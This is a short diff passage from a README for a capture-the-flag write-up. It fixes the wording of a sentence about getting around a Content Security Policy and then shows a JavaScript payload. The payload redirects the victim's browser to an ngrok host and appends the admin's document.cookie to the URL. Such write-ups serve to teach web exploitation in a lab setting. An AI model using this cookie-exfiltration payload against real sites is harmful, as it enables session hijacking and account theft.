Neptunians/intent-ctf-2021-writeup/README.md

 out.close()
 ```

 For the actual Javascript payload.
-I tried to first make a fetch my URL with the admin cookie, but fetching other domain is blocked by CSP.
+I tried to first make a fetch for my URL with the admin cookie, but fetching other domain is also blocked by the CSP.
 We can bypass it by redirecting the browser page to our domain.

 ```javascript
 window.location.href = 'http://66e9-201-17-126-102.ngrok.io/flag?'+encodeURIComponent(document.cookie);